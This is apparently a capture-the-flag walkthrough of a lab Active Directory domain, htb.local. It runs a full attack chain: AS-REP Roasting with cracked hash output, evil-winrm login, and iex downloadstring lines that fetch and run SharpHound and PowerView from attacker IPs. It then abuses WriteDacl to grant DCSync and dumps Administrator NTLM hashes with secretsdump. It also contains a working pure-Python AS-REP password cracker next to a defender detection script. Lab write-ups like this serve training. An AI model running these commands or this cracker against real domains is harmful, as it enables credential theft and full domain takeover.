CN=HealthMailbox6ded67848a234577a1756e072081d01f,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox83d6781be36b4bbf8893b03c2ee379ab,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxfd87238e536e49e08738480d300e3772,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailboxb01ac647a64648d2a5fa21df27058a24,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox7108a4e350f84b32a7a90d8e718f78cf,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=HealthMailbox0659cc188f4c4f9f978f6c2142c4181e,CN=Monitoring Mailboxes,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=Exchange Install Domain Servers,CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=SystemMailbox{ce2583c9-4e38-48ab-b23d-88d6e3aa059f},CN=Microsoft Exchange System Objects,DC=htb,DC=local
CN=Program Data,DC=htb,DC=local
CN=Microsoft,CN=Program Data,DC=htb,DC=local
CN=NTDS Quotas,DC=htb,DC=local
CN=Managed Service Accounts,DC=htb,DC=local
CN=Keys,DC=htb,DC=local
OU=Service Accounts,DC=htb,DC=local
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
OU=Security Groups,DC=htb,DC=local
CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
CN=test,OU=Security Groups,DC=htb,DC=local
OU=Employees,DC=htb,DC=local
OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Exchange Administrators,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Sebastien Caron,OU=Exchange Administrators,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Developers,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Santi Rodriguez,OU=Developers,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Application Support,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=IT Management,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Lucinda Berger,OU=IT Management,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Helpdesk,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Andy Hislip,OU=Helpdesk,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Sysadmins,OU=Information Technology,OU=Employees,DC=htb,DC=local
CN=Mark Brandt,OU=Sysadmins,OU=Information Technology,OU=Employees,DC=htb,DC=local
OU=Sales,OU=Employees,DC=htb,DC=local
OU=Marketing,OU=Employees,DC=htb,DC=local
OU=Reception,OU=Employees,DC=htb,DC=local
CN=TPM Devices,DC=htb,DC=local
CN=Builtin,DC=htb,DC=local
CN=Account Operators,CN=Builtin,DC=htb,DC=local
CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=htb,DC=local
CN=Incoming Forest Trust Builders,CN=Builtin,DC=htb,DC=local
CN=Windows Authorization Access Group,CN=Builtin,DC=htb,DC=local
CN=Terminal Server License Servers,CN=Builtin,DC=htb,DC=local
CN=Administrators,CN=Builtin,DC=htb,DC=local
CN=Users,CN=Builtin,DC=htb,DC=local
CN=Guests,CN=Builtin,DC=htb,DC=local
CN=Print Operators,CN=Builtin,DC=htb,DC=local
CN=Backup Operators,CN=Builtin,DC=htb,DC=local
CN=Replicator,CN=Builtin,DC=htb,DC=local
CN=Remote Desktop Users,CN=Builtin,DC=htb,DC=local
CN=Network Configuration Operators,CN=Builtin,DC=htb,DC=local
CN=Performance Monitor Users,CN=Builtin,DC=htb,DC=local
CN=Performance Log Users,CN=Builtin,DC=htb,DC=local
CN=Distributed COM Users,CN=Builtin,DC=htb,DC=local
CN=IIS_IUSRS,CN=Builtin,DC=htb,DC=local
CN=Cryptographic Operators,CN=Builtin,DC=htb,DC=local
CN=Event Log Readers,CN=Builtin,DC=htb,DC=local
CN=Certificate Service DCOM Access,CN=Builtin,DC=htb,DC=local
CN=RDS Remote Access Servers,CN=Builtin,DC=htb,DC=local
CN=RDS Endpoint Servers,CN=Builtin,DC=htb,DC=local
CN=RDS Management Servers,CN=Builtin,DC=htb,DC=local
CN=Hyper-V Administrators,CN=Builtin,DC=htb,DC=local
CN=Access Control Assistance Operators,CN=Builtin,DC=htb,DC=local
CN=Remote Management Users,CN=Builtin,DC=htb,DC=local
CN=System Managed Accounts Group,CN=Builtin,DC=htb,DC=local
CN=Storage Replica Administrators,CN=Builtin,DC=htb,DC=local
CN=Server Operators,CN=Builtin,DC=htb,DC=local
OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Recipient Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=View-Only Organization Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Public Folder Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=UM Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Help Desk,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Records Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Discovery Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Server Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Delegated Setup,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Hygiene Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Compliance Management,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Security Reader,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Security Administrator,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Exchange Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Managed Availability Servers,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
CN=ExchangeLegacyInterop,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[*] Bye!
Key finding:
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
The htb.local domain has a service account named svc-alfresco, which can be attacked with AS-REP Roasting.
AS-REP Roasting attack
Differences between AS-REP Roasting and Kerberoasting
AS-REP Roasting:
AS-REP Roasting extracts an account's AS-REP hash for offline brute-forcing. The precondition is that the account has Kerberos pre-authentication disabled, i.e. the uf_dont_require_preauth flag set to true.
Kerberoasting:
Kerberoasting usually requires valid domain credentials to authenticate; it then extracts service account credential hashes from the domain for offline cracking.
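The two preconditions just described are what a defender should audit for and alert on. The following is an added example (not from the writeup, and not windapsearch or Impacket code): it flags LDAP user records whose userAccountControl carries DONT_REQ_PREAUTH, and flags Security event 4768 records that show a TGT issued with no pre-authentication, marking RC4 (etype 0x17) as the crackable case. All records and client addresses are constructed samples.

```python
"""Defender-side checks for the AS-REP Roasting precondition explained above.

Added example, not part of the original writeup and not windapsearch or
Impacket code.  Two stand-alone checks:
  1. flag LDAP user records whose userAccountControl carries DONT_REQ_PREAUTH
     (the flag the text calls uf_dont_require_preauth);
  2. flag Security event 4768 (TGT requested) records with Pre-Authentication
     Type 0 on a successful request, reporting RC4 (0x17) as the crackable case.
All records and client addresses below are constructed samples.
"""
import re

# userAccountControl bit flags (documented Microsoft values)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Server-side equivalent for an authenticated audit query (bitwise-AND rule).
PREAUTH_DISABLED_FILTER = (
    "(&(objectCategory=person)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

# Constructed sample records shaped like an LDAP query result.
SAMPLE_USERS = [
    # 0x410200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 4260352},
    # 0x010200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    {"sAMAccountName": "sebastien", "userAccountControl": 66048},
    # 0x410202 = like svc-alfresco but also ACCOUNTDISABLE
    {"sAMAccountName": "old-svc", "userAccountControl": 4260354},
]


def accounts_without_preauth(records, include_disabled=False):
    """Return sAMAccountNames with DONT_REQ_PREAUTH set.

    Disabled accounts cannot obtain a TGT, so they are skipped by default."""
    hits = []
    for rec in records:
        uac = int(rec["userAccountControl"])
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        hits.append(rec["sAMAccountName"])
    return hits


# Fields of interest in the message body of Security event 4768.
FIELD_RE = re.compile(
    r"^\s*(Account Name|Client Address|Ticket Encryption Type|"
    r"Pre-Authentication Type|Result Code):\s*(\S+)",
    re.MULTILINE,
)

# Constructed 4768 bodies: one roast-style request, one ordinary logon.
SAMPLE_EVENTS = [
    """An authentication ticket (TGT) was requested.
    Account Name:       svc-alfresco
    Supplied Realm Name:    HTB.LOCAL
    Client Address:     ::ffff:192.0.2.10
    Result Code:        0x0
    Ticket Encryption Type: 0x17
    Pre-Authentication Type:    0
""",
    """An authentication ticket (TGT) was requested.
    Account Name:       sebastien
    Supplied Realm Name:    HTB.LOCAL
    Client Address:     ::ffff:192.0.2.20
    Result Code:        0x0
    Ticket Encryption Type: 0x12
    Pre-Authentication Type:    2
""",
]


def parse_4768(text):
    """Extract the fields FIELD_RE knows about into a dict."""
    return dict(FIELD_RE.findall(text))


def flag_asrep_roast(events):
    """Return one alert per 4768 event whose TGT was issued with no pre-auth.

    Pre-Authentication Type 0 on a successful request means the KDC issued
    the TGT without a PA-ENC-TIMESTAMP, i.e. the response was obtainable
    without knowing the password.  Encryption type 0x17 (RC4-HMAC) is the
    etype 23 that hashcat mode 18200 cracks, so it is marked as high risk."""
    alerts = []
    for ev in events:
        f = parse_4768(ev)
        if f.get("Pre-Authentication Type") != "0" or f.get("Result Code") != "0x0":
            continue
        etype = f.get("Ticket Encryption Type", "").lower()
        alerts.append({
            "account": f.get("Account Name"),
            "client": f.get("Client Address"),
            "etype": etype,
            "rc4": etype == "0x17",
        })
    return alerts
```

The same userAccountControl filter run as an authenticated LDAP query against the DC gives the full list of exposed accounts; the 4768 check is what to wire into SIEM detection.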
Obtaining the TGT hash with GetNPUsers.py from the Impacket package
Download:
https://github.com/fortra/impacket
Install:
pip install -r requirements.txt
Tool location:
impacket-0.10.0/examples/
Usage:
python GetNPUsers.py htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
The returned TGT hash:
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb
Cracking the TGT hash with hashcat
Usage:
hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
Parameter explanation:
hash.txt contains the TGT hash; rockyou.txt is the wordlist (if the crack fails, add more candidate passwords to the list); --force ignores warnings and errors; -m 18200 selects the hash mode Kerberos 5, etype 23, AS-REP.
TGT Hash:$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb
Result:
└─# hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.5) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-12th Gen Intel(R) Core(TM) i5-12400F, 1428/2921 MB (512 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Initializing backend runtime for device #1. Please be patient...
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14342314
* Bytes.....: 139917341
* Keyspace..: 14342306
* Runtime...: 1 sec
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e02274cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d55479606438471030499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c44b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56524d4f415ae283ef0feb:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e...ef0feb
Time.Started.....: Sat Dec 24 07:24:55 2022, (0 secs)
Time.Estimated...: Sat Dec 24 07:24:55 2022, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 24330 H/s (0.52ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1024/14342306 (0.01%)
Rejected.........: 0/1024 (0.00%)
Restore.Point....: 0/14342306 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> abcd1234
Hardware.Mon.#1..: Util: 45%
Started: Sat Dec 24 07:24:26 2022
Stopped: Sat Dec 24 07:24:57 2022
Recovered plaintext: s3rvice
Cracking with john:
john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt
--fork=4 runs four worker processes; it does not select the hash type. john recognises the krb5asrep format from the $krb5asrep$ prefix, as the "Loaded 1 password hash (krb5asrep ...)" line below shows
hash.txt the AS-REP hash
-w= the wordlist (rockyou)
john hash.txt --fork=4 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1 1g 0:00:00:00 DONE (2022-12-24 07:33) 100.0g/s 1600p/s 1600c/s 1600C/s 123456..hello
Waiting for 3 children to terminate
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
3 1g 0:00:00:02 DONE (2022-12-24 07:33) 0.3597g/s 367263p/s 367263c/s 367263C/s s3tang1tar..s3rena
2 0g 0:00:00:10 DONE (2022-12-24 07:33) 0g/s 356757p/s 356757c/s 356757C/s xCvBnM,..*7¡Vamos!
4 0g 0:00:00:10 DONE (2022-12-24 07:33) 0g/s 356756p/s 356756c/s 356756C/s c125263.abygurl69
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Show an earlier result: john --show hash.txt (the hash file that was cracked)
john records cracked hashes in its pot file, so running the same file again only reports that it is already cracked; use the command above to print the recovered password
$krb5asrep$23$svc-alfresco@HTB.LOCAL:s3rvice
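Both cracking runs above test candidates against the same AS-REP blob. The script below is an added example, not code from the page, impacket, hashcat or john: it does in plain Python what hashcat -m 18200 and john's krb5asrep format do for every candidate, namely parse the $krb5asrep$23$ line, derive the RC4-HMAC keys from the candidate's NT hash (RFC 4757, with the Microsoft key-usage number 8 for the AS-REP enc-part), decrypt, and recompute the HMAC-MD5 checksum. It uses only the standard library (MD4 is implemented inline because OpenSSL 3 keeps it in the legacy provider), embeds the svc-alfresco hash from this page, and the short wordlist standing in for rockyou.txt is constructed.

```python
"""Offline check of an AS-REP roast hash (etype 23, RC4-HMAC) against candidate passwords.

Line format, as written by GetNPUsers.py and read by hashcat -m 18200 / john krb5asrep:
    $krb5asrep$23$<user>@<REALM>:<hex 16-byte HMAC-MD5 checksum>$<hex RC4 ciphertext>
The KDC built it from the user's NT hash K (RFC 4757, Microsoft usage number 8 for the
AS-REP enc-part): Ki = HMAC-MD5(K, usage); checksum = HMAC-MD5(Ki, confounder||EncASRepPart);
Ke = HMAC-MD5(Ki, checksum); ciphertext = RC4(Ke, confounder||EncASRepPart).
A candidate password is right iff the checksum recomputed over the decrypted data matches.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# The svc-alfresco hash exactly as GetNPUsers.py printed it on this page.
PAGE_HASH = (
    "$krb5asrep$23$svc-alfresco@HTB.LOCAL:ed80362bb99a9e6a4ea7ee992099b166$f9765655288e022"
    "74cc6883e9220bb2054dda0425366b97d32d2f99b0d6c2e93447fe97b68aff828ad7877818b3347b5d2d6"
    "263071442c940d97513794d14f763239e07348093a1c8c66ce3d0b60989f4719e5b4af9b328ec04eb1663"
    "b676cecbf2774fac5d6e866bba36f18cf1ed539594a621c1e31a800ba489fe672db5d5547960643847103"
    "0499747a253f2a48bb88dd98525260835576cef6aa0aeaab13c09d1c654e8ba1c3158fbc2904ca59300c4"
    "4b4626f7042e1937be3f261cdf93b1f960c74fb316c6180d131f0ca6980c3ca07c09eabfd25b2156f8e56"
    "524d4f415ae283ef0feb"
)
MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (OpenSSL 3 ships MD4 only in its legacy provider,
    so hashlib.new('md4') cannot be relied on)."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: registers rotate so each step updates "a"
            a, d, c, b = d, c, b, rol((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, d, c, b = d, c, b, rol((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, d, c, b = d, c, b, rol((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def _rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (KSA + PRGA); encryption and decryption are the same operation."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; it is also the Kerberos RC4-HMAC long-term key."""
    return _md4(password.encode("utf-16le"))


def parse_asrep_hash(line: str) -> dict:
    """Split a $krb5asrep$23$ line into user, realm, checksum and ciphertext; reject anything else."""
    parts = line.strip().split("$")  # ['', 'krb5asrep', '23', 'user@REALM:checksum', 'edata']
    if len(parts) != 5 or parts[0] != "" or parts[1] != "krb5asrep":
        raise ValueError("not a $krb5asrep$ line")
    if parts[2] != "23":
        raise ValueError("etype %s is not RC4-HMAC; AES AS-REPs (etype 17/18) need a PBKDF2 key" % parts[2])
    principal, colon, checksum_hex = parts[3].partition(":")
    user, at, realm = principal.partition("@")
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(parts[4])
    if not (colon and at) or len(checksum) != 16 or len(edata) < 8:
        raise ValueError("malformed principal, checksum or ciphertext")
    return {"user": user, "realm": realm, "checksum": checksum, "edata": edata}


def asrep_matches(line: str, password: str) -> bool:
    """One hashcat/john guess: derive the RC4-HMAC keys from the candidate, decrypt, verify the HMAC."""
    fields = parse_asrep_hash(line)
    ki = hmac.new(nt_hash(password), struct.pack("<I", 8), hashlib.md5).digest()  # usage 8 = AS-REP enc-part
    ke = hmac.new(ki, fields["checksum"], hashlib.md5).digest()
    plain = _rc4(ke, fields["edata"])  # 8-byte confounder || EncASRepPart
    return hmac.compare_digest(hmac.new(ki, plain, hashlib.md5).digest(), fields["checksum"])


def crack_asrep(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: the first candidate whose keys verify the AS-REP, or None."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if asrep_matches(line, candidate):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini-wordlist standing in for rockyou.txt.
    print(crack_asrep(PAGE_HASH, ["123456", "password", "s3rvice", "alfresco"]))
```

Pure-Python MD4 and RC4 make this thousands of times slower than hashcat, but it shows what the tooling hides: no step of the check talks to the KDC, so one captured AS-REP for a pre-authentication-disabled account is enough to attack the password offline for as long as the attacker likes. AES AS-REPs (etype 17/18) are refused on purpose: their key is derived with PBKDF2-HMAC-SHA1 (4096 iterations by default), which is why john reports a separate, much slower path for those.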
Logging in over WinRM
Install:
gem install evil-winrm
Download: https://github.com/Hackplayers/evil-winrm/releases/tag/v3.3
Command:
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
-i target IP
-u the service account
-p the plaintext password recovered from the AS-REP hash with john or hashcat
Get the user flag:
type c:\Users\svc-alfresco\desktop\user.txt
Finding a privilege escalation path with BloodHound
Log in over WinRM and load the BloodHound PowerShell collector
1. Serve SharpHound.ps1 over HTTP on port 80 with Python
In the directory containing SharpHound.ps1 run python3 -m http.server 80
2. Load the PowerShell script in the WinRM session
iex(new-object net.webclient).downloadstring("http://10.10.14.26/SharpHound.ps1")
Replace 10.10.14.26 with your own address (check it with ip addr)
3. Run the collector
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
4. Download the collected zip
In the evil-winrm session run download remote_path local_path
Installing BloodHound:
pip install pycrypto //dependency
pip install bloodhound //the Python collector (bloodhound-python)
apt install bloodhound //the GUI itself
sudo apt install default-jre //a current Java runtime, not required
Alternatively the Python collector gathers the same domain data from Kali without running anything on the target:
bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb.local -c all -ns 10.10.10.161
Starting BloodHound:
neo4j start
neo4j/neo4j default credentials (neo4j asks you to change them on first login)
start bloodhound from the Kali tools menu and upload the collected zip
Analysis:
Start node: SVC-ALFRESCO@HTB.LOCAL
Target node: DOMAIN ADMINS@HTB.LOCAL
Path:
1. SVC-ALFRESCO@HTB.LOCAL MemberOf SERVICE ACCOUNTS@HTB.LOCAL
2. SERVICE ACCOUNTS@HTB.LOCAL MemberOf PRIVILEGED IT ACCOUNTS@HTB.LOCAL
3. PRIVILEGED IT ACCOUNTS@HTB.LOCAL MemberOf ACCOUNT OPERATORS@HTB.LOCAL
4. ACCOUNT OPERATORS@HTB.LOCAL GenericAll EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL
5. EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL WriteDacl DOMAIN ADMINS@HTB.LOCAL
The service account we control, SVC-ALFRESCO@HTB.LOCAL, is in SERVICE ACCOUNTS@HTB.LOCAL, which is nested in PRIVILEGED IT ACCOUNTS@HTB.LOCAL, which is nested in ACCOUNT OPERATORS@HTB.LOCAL; group membership is transitive, so svc-alfresco effectively holds Account Operators rights.
ACCOUNT OPERATORS@HTB.LOCAL has GenericAll (full control) over EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL, so it can add any account to that group.
The Exchange group in turn holds WriteDacl, i.e. the right to rewrite the DACL of its target. The commands below use it to write a DCSync grant into the DACL of the domain object DC=htb,DC=local; the replication rights that DCSync needs live on that domain object (not on the Domain Admins group BloodHound draws the path towards), and they are what lets an otherwise unprivileged account pull every hash from the DC.
Summary:
1. SVC-ALFRESCO@HTB.LOCAL is, through nested groups, a member of ACCOUNT OPERATORS@HTB.LOCAL
2. ACCOUNT OPERATORS@HTB.LOCAL has GenericAll over EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL
3. EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL's WriteDacl is used to grant DCSync on the domain, which gives domain admin level access
Commands to add a member:
net group "EXCHANGE TRUSTED SUBSYSTEM" svc-alfresco /add /domain //add (this is the GenericAll edge: Account Operators may manage this group)
net group "EXCHANGE TRUSTED SUBSYSTEM" //query to confirm the membership
The current shell's access token was built when svc-alfresco logged on and will not contain the new group until a fresh logon, so it is cleaner to create a new account, add it to EXCHANGE TRUSTED SUBSYSTEM@HTB.LOCAL and pass its credential explicitly in the next step:
net user hack hack@123 /add /domain
net group "EXCHANGE TRUSTED SUBSYSTEM" hack /add /domain
Abusing WriteDacl to escalate privileges
Download:
Abusing WriteDacl uses PowerView from the PowerSploit toolkit
https://github.com/PowerShellMafia/PowerSploit
the PowerShell script is PowerView.ps1 in the Recon directory
Steps:
In PowerSploit-3.0.0/Recon run python3 -m http.server 80
In the evil-winrm shell:
Method 1:
iex(New-Object Net.webclient).downloadstring('http://10.10.16.9/PowerView.ps1')
(10.10.16.9 is the attacker's address in this run; use your own)
$pass = convertto-securestring 'hack@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\hack', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hack -Rights DCSync
Method 2:
iex(New-Object Net.webclient).downloadstring('http://10.10.16.9/PowerView.ps1')
net user john abc123! /add /domain
net group "Exchange Windows Permissions" john /add
net localgroup "Remote Management Users" john /add //membership in this local group lets john log in over WinRM
$pass = convertto-securestring 'abc123!' -asplain -force
$cred = new-object system.management.automation.pscredential('htb\john',$pass)
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
Add-DomainObjectAcl is the name in the current PowerView (master branch); the 3.0.0 release carries the older Add-ObjectAcl. If Add-DomainObjectAcl is not recognised, download the master branch via Code on GitHub instead of the Latest release.
Both methods pass the new account's credential with -Credential so the ACL write runs under a token that already contains the Exchange group membership; the caller's own stale token would lack it.
Check the grant before moving on:
Get-DomainObjectAcl -Identity "DC=htb,DC=local" -ResolveGUIDs | ? { $_.SecurityIdentifier -match (Get-DomainUser hack).objectsid } //the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All ACEs must be present
DCSync:
Use secretsdump.py from the impacket toolkit to perform the DCSync
The author used impacket 0.9.22; impacket 0.10.0 may be incompatible with this setup and fail
impacket-impacket_0_9_22\examples\secretsdump.py
python3 secretsdump.py hack:hack@123@10.10.10.161
(the target syntax is [domain/]user[:password]@host, so htb.local/hack:hack@123@10.10.10.161 is the fully qualified form)
Result (the RemoteOperations access-denied line is expected: hack is not a local administrator on the DC, but the DRSUAPI replication path needs only the DCSync rights just granted):
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
